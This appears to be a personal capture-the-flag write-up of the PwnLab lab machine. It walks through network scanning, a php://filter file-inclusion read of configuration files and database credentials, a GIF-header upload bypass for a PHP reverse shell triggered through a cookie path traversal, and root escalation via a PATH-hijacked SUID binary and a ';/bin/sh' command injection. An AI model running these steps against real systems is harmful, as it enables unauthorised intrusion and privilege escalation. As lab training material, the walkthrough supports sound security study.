CTF PwnLab

  1. netdiscover
  2. nmap
  3. port 80
    1. gobuster
  4. port 111
  5. Mysql
  6. Port 80 LFI
  7. Mysql
    1. Browse the database
    2. Decode the hash
  8. Upload a revershell
  9. Connect as kane

netdiscover

sudo netdiscover


192.168.0.29

nmap

nmap -sV 192.168.0.29 -p- 


80, 11, 3306, 33795

port 80

gobuster

gobuster dir -t 100 -u http://192.168.0.29/ -w ~/Documents/wordlist/directory-list-medium.txt

/upload               (Status: 301) [Size: 313] [--> http://192.168.0.29/upload/]
/images               (Status: 301) [Size: 313] [--> http://192.168.0.29/images/]

port 111

sudo nmap -sSUC -p111 192.168.0.29

PORT    STATE SERVICE
111/tcp open  rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33795/tcp   status
|   100024  1          44347/udp6  status
|   100024  1          50459/tcp6  status
|_  100024  1          60795/udp   status
111/udp open  rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33795/tcp   status
|   100024  1          44347/udp6  status
|   100024  1          50459/tcp6  status
|_  100024  1          60795/udp   status

Nothing interesting

Mysql

I don’t have the creds so I can try to exploit now.

Port 80 LFI

https://blog.certcube.com/detailed-cheatsheet-lfi-rce-websheels/

It’s not working for /etc/passwd but there is a file login and upload, I can try them.

curl http://192.168.0.29/\?page\=php://filter/read\=convert.base64-encode/resource\=login 

Output:

<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==</center>
</body>
</html>%   

I have to decode it, it’s in base 64.

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
	$luser = $_POST['user'];
	$lpass = base64_encode($_POST['pass']);
...

We also have the file config.php.

curl http://192.168.0.29/\?page\=php://filter/read\=convert.base64-encode/resource\=config

Output:

<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

We have the creds for the mysql

Mysql

Browse the database

mysql -u root -h 192.168.0.29 -p 
H4u%QJ_H99
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+

SHOW TABLES;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+

select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+

Decode the hash

We can decode them, with a base64 decoder.

echo "Sld6WHVCSkpOeQ==" | base64 --decode
JWzXuBJJNy

kent | JWzXuBJJNy
mike | SIfdsTEn6I
kane | iSv5Ym2GRo

Upload a revershell


Let’s upload a revershell.

Ok let’s upload an image ( ͡° ͜ʖ ͡°).

cp phprc.php rc.jpg


It’s not working, let’s see the code of upload.php.

curl http://192.168.0.29/\?page\=php://filter/read\=convert.base64-encode/resource\=upload

...
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') { die('Error 002');
...

I have the error 002 because of the mime verification, I need to bypass it.
I have to add this code in my file.

GIF89aP;
[shell]


After the upload I change the cookie, it was hard to find this solution.

I send the request an now i have a shell.

GET / HTTP/1.1
Host: 192.168.0.29
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.29/
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: lang=../upload/29e8ea4a462331c5af3754eb8dbd4328.gif
Connection: close

Connect as kane

python -c 'import pty; pty.spawn("/bin/bash")'
su kane
iSv5Ym2GRo


In the home directory we have the file msgmike it’s an executable.

-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike


So it will run as mike.
let’s see what is inside:

strings ms*

/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh 
QVh[
[^_]
cat /home/mike/msg.txt
;*2$"(
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id

...

As we can see it’s using the command cat.
google: exploit binaries privesc suid.
https://materials.rangeforce.com/tutorial/2019/11/07/Linux-PrivEsc-SUID-Bit/

We are using cat and not whoami.

echo "/bin/bash" > /tmp/cat 
chmod 777 /tmp/cat  
export PATH=/tmp:$PATH
./msgmike
id

Output:

uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)


Now let’s see what is in the home director.
We have a similar programe called msg2root.

strings msg2root

/bin/echo %s >> /root/messages.txt

The %s is like the $1 in bash, he need an argument.
I will execute 2 cammmands, the first one is echo, the second one is /bin/sh.

A; B # Run A and then B, regardless of success of A 
A && B # Run B if and only if A succeeded 
A || B # Run B if and only if A failed 
A & # Run A in background.

I’m gonna use ; to execute the 2 commands.

./msg2root 
sdf;/bin/sh
id

Output:

uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)

I’m gonna display the flag.
Cat is broken si I’m gonna use tail.

tail /root/*

Output:

==> /root/flag.txt <==
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'

==> /root/messages.txt <==